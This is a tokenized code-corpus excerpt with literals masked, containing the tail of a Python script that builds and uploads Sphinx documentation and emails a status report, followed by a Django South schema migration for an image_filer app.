[ virtual_python , os . path . join ( gitdname , <EOL> '<STR_LIT>' ) , '<STR_LIT>' ] ) , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> os . chdir ( dname ) <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> return version <EOL> def print_info ( ) : <EOL> subprocess . Popen ( [ virtual_python , os . path . 
join ( gitdname , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) ] , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> def build_docs ( branch ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( os . path . join ( gitdname , '<STR_LIT>' ) ) <EOL> retcode = subprocess . call ( "<STR_LIT>" , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> os . chdir ( dname ) <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> sphinx_call = "<STR_LIT:U+0020>" . join ( [ '<STR_LIT>' , '<STR_LIT:html>' , "<STR_LIT>" <EOL> "<STR_LIT>" ] ) <EOL> activate = os . path . join ( virtual_dir , "<STR_LIT>" , "<STR_LIT>" ) <EOL> activate_virtualenv = "<STR_LIT>" + activate <EOL> retcode = subprocess . call ( "<STR_LIT>" . join ( [ activate_virtualenv , sphinx_call ] ) , <EOL> shell = True , env = env , stdout = sys . stdout , <EOL> stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> os . chdir ( dname ) <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def build_pdf ( branch ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( os . path . join ( gitdname , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> sphinx_dir = os . path . join ( virtual_dir , '<STR_LIT>' ) <EOL> retcode = subprocess . call ( "<STR_LIT:U+0020>" . join ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' + sphinx_dir + '<STR_LIT>' ] ) , <EOL> shell = True ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def upload_docs ( branch ) : <EOL> if branch == '<STR_LIT>' : <EOL> remote_dir = '<STR_LIT>' <EOL> else : <EOL> remote_dir = '<STR_LIT>' <EOL> os . chdir ( os . path . join ( gitdname , '<STR_LIT>' ) ) <EOL> retcode = subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , sf_account + '<STR_LIT>' + <EOL> remote_dir ] , <EOL> stderr = sys . 
stderr , stdout = sys . stdout ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % ( remote_dir , <EOL> branch ) <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def upload_pdf ( branch ) : <EOL> if branch == '<STR_LIT>' : <EOL> remote_dir = '<STR_LIT>' <EOL> else : <EOL> remote_dir = '<STR_LIT>' <EOL> os . chdir ( os . path . join ( dname , new_branch_dir , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> retcode = subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> sf_account + '<STR_LIT>' + remote_dir + '<STR_LIT>' ] ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = ( "<STR_LIT>" % <EOL> ( remote_dir + '<STR_LIT>' , branch ) ) <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def email_me ( status = '<STR_LIT>' ) : <EOL> if status == '<STR_LIT>' : <EOL> message = """<STR_LIT>""" <EOL> subject = "<STR_LIT>" <EOL> else : <EOL> message = status <EOL> subject = "<STR_LIT>" <EOL> msg = MIMEText ( message ) <EOL> msg [ '<STR_LIT>' ] = subject <EOL> msg [ '<STR_LIT>' ] = email_name <EOL> msg [ '<STR_LIT>' ] = email_name <EOL> server = smtplib . SMTP ( '<STR_LIT>' , <NUM_LIT> ) <EOL> server . ehlo ( ) <EOL> server . starttls ( ) <EOL> server . ehlo ( ) <EOL> server . login ( email_name , gmail_pwd ) <EOL> server . sendmail ( email_name , to_email , msg . as_string ( ) ) <EOL> server . close ( ) <EOL> def main ( ) : <EOL> msg = '<STR_LIT>' <EOL> for branch in branches : <EOL> try : <EOL> create_virtualenv ( ) <EOL> create_update_gitdir ( ) <EOL> version = install_branch ( branch ) <EOL> if check_version ( branch , version ) : <EOL> print_info ( ) <EOL> build_docs ( branch ) <EOL> upload_docs ( branch ) <EOL> else : <EOL> msg += ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( branch ) ) <EOL> except : <EOL> msg += traceback . format_exc ( ) <EOL> if msg == '<STR_LIT>' : <EOL> email_me ( ) <EOL> else : <EOL> email_me ( msg ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from south . db import db <EOL> from django . db import models <EOL> from image_filer . models import * <EOL> class Migration : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT>' , orm [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , orm [ '<STR_LIT>' ] ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : 
'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : 
"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : 
'<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) 
, <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , 
'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:float>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' 